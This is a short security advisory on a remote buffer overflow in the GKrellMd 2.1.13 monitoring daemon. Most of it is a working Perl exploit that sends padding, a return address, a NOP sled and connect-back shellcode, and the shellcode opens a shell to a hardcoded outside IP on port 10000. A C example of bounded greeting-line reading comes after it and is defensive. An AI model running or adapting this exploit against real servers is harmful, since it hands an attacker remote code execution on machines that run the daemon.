source: http://www.securityfocus.com/bid/8022/info
GKrellMd has been reported prone to a remote buffer overflow vulnerability; arbitrary code execution is possible.
The issue stems from insufficient bounds checking of network-supplied data. If data exceeding the size of the reserved memory buffer is received, adjacent memory may be corrupted.
A remote attacker may ultimately exploit this issue to seize control of the affected daemon and execute arbitrary code.
This vulnerability has been reported to affect Gkrellm 2.1.13.
#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.
use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); }
$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbfbffa60);
$shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x26\x26\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
#--> connect-back to a useless ip, change it:) ^^217.157.38.38^ ^^10000^
$nop = "\x90";
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;
$socket = new IO::Socket::INET
(
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "gkrellm 2.1.10\n"; #tell the daemon which client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;
close($socket);
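As an added example (not from the advisory and not GKrellM's own code), here is a bounded reader for the client greeting line that the script above sends first, the point where a daemon first meets oversized network input. The 128-byte buffer size is modelled on the exploit's padding, and the function names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Assumed fixed greeting buffer; sized after the 128-byte padding in the
 * exploit script above, not taken from gkrellmd's sources. */
#define GREETING_BUF 128

enum line_status { LINE_OK = 0, LINE_TOO_LONG = -1, LINE_INCOMPLETE = -2 };

/* Copy one '\n'-terminated line from the receive buffer rx (rxlen bytes) into
 * dst (dstsz bytes, NUL-terminated). A reader that copies up to the newline
 * without comparing against dstsz is the pattern the advisory describes; here
 * any line that would not fit is refused before a single byte is written. */
int read_client_line(const char *rx, size_t rxlen, char *dst, size_t dstsz)
{
    const char *nl = memchr(rx, '\n', rxlen);
    size_t linelen = nl ? (size_t)(nl - rx) : rxlen;

    if (linelen >= dstsz)          /* leave room for the terminating NUL */
        return LINE_TOO_LONG;
    if (!nl)                       /* no terminator yet, but still in bounds */
        return LINE_INCOMPLETE;
    memcpy(dst, rx, linelen);
    dst[linelen] = '\0';
    return LINE_OK;
}

/* Accept only "gkrellm <digits and dots>" as the client greeting. */
int greeting_is_valid(const char *line)
{
    const char prefix[] = "gkrellm ";
    if (strncmp(line, prefix, sizeof prefix - 1) != 0)
        return 0;
    const char *v = line + sizeof prefix - 1;
    if (*v == '\0')
        return 0;
    for (; *v; v++)
        if (!((*v >= '0' && *v <= '9') || *v == '.'))
            return 0;
    return 1;
}

/* Constructed sample traffic: the greeting the exploit sends, then an
 * overlong run of 'A' bytes standing in for its payload. */
int demo(void)
{
    char buf[GREETING_BUF];
    const char *hello = "gkrellm 2.1.10\n";
    char flood[GREETING_BUF + 64];
    memset(flood, 'A', sizeof flood);

    if (read_client_line(hello, strlen(hello), buf, sizeof buf) != LINE_OK) return 0;
    if (!greeting_is_valid(buf)) return 0;
    if (read_client_line(flood, sizeof flood, buf, sizeof buf) != LINE_TOO_LONG) return 0;
    return 1;
}
```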